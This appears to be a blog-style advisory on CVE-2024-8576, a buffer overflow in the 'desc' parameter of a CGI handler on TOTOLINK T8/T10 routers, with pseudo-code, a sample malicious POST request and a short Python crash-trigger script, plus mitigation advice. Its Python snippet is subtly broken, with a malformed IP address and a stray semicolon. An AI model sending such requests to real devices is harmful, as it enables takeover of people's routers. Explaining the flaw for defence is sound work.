CVE-2024-8576 - Critical Buffer Overflow in TOTOLINK AC120 (T8, T10) Routers – Remote Exploit Exposed

On recent versions of TOTOLINK AC120 home/office routers (models T8 and T10, firmware 4.1.5cu.861_B20230220/4.1.8cu.5207), a severe remote buffer overflow vulnerability was discovered. The issue, assigned CVE-2024-8576, directly impacts the setIpPortFilterRules function inside /cgi-bin/cstecgi.cgi. By manipulating the desc parameter in a POST request, a remote attacker can reliably cause a buffer overflow—leading to a full device compromise.

The vendor, TOTOLINK, did not reply to initial communications about this flaw. Since then, details and proof of exploit have been published. If you’re using these routers, action is required—unplug them or segment them from untrusted networks immediately.

What’s At Risk?

- Devices Impacted: TOTOLINK AC120 T8 and T10 routers (firmware 4.1.5cu.861_B20230220 / 4.1.8cu.5207)
- Vulnerable Endpoint: /cgi-bin/cstecgi.cgi

Remote Exploitability?: Yes

- Patch/Response?: No response from vendor

Technical Details

The vulnerable handler is triggered when an authenticated (and sometimes unauthenticated) HTTP POST is sent to /cgi-bin/cstecgi.cgi, calling the setIpPortFilterRules function. The router does not properly check the length of the desc value from user-controllable input before copying it into a fixed-size buffer.

Vulnerable Code Path (conceptual)

// Vulnerable pseudo-code snippet
void setIpPortFilterRules() {
    char desc[64]; // fixed-size buffer
    // ... receive POST data
    strcpy(desc, get_post_arg("desc")); // Classic overflow!
    // ... use desc
}

> desc can be abused to overwrite the memory right after the buffer (return address, function pointers, etc).

Sample Malicious Request

POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: [router-ip]
Content-Type: application/x-www-form-urlencoded

action=setIpPortFilterRules&desc=AAAA...[overflow payload]...BBBB

- AAAA...BBBB should be long enough (100-200+ characters) to overflow the 64-byte buffer, overwriting the return address.

The payload is followed by shellcode or ROP chain if you want more power.

On default setups, authentication is weak, making it easier for attackers to reach this handler.

Public Proof-of-Concept

An example exploit has been released publicly. Researchers at Packet Storm and Exploit-DB have published working scripts.

Python Example Snippet

import requests

router_ip = "192.168..1"
exploit_payload = "A" * 256  # Change based on testing

data = {
    "action": "setIpPortFilterRules",
    "desc": exploit_payload
}

# No authentication (or default creds)
r = requests.post(f"http://{router_ip}/cgi-bin/cstecgi.cgi";, data=data)
print(r.text)

Segregate: Don’t expose router management ports to the Internet.

- Watch for patches: Follow totolink.net for potential future fixes.

Original References & More Info

- NVD CVE-2024-8576 Entry
- Exploit-DB PoC (if available)
- Seclists Advisory
- Packet Storm writeup
- TOTOLINK homepage

Conclusion

The combination of a remotely reachable endpoint, buffer overflow, and no vendor support marks CVE-2024-8576 as critical. TOTOLINK users with affected T8 and T10 routers should treat their devices as wide open to attack until a fix is confirmed. Default credentials and poor network controls make this a low-effort, high-impact hack for attackers.

If you own these devices, disconnect and replace them immediately.

*Stay safe. Bookmark this article for updates as they emerge.*

Timeline

Published on: 09/08/2024 18:15:02 UTC
Last modified on: 09/09/2024 18:59:57 UTC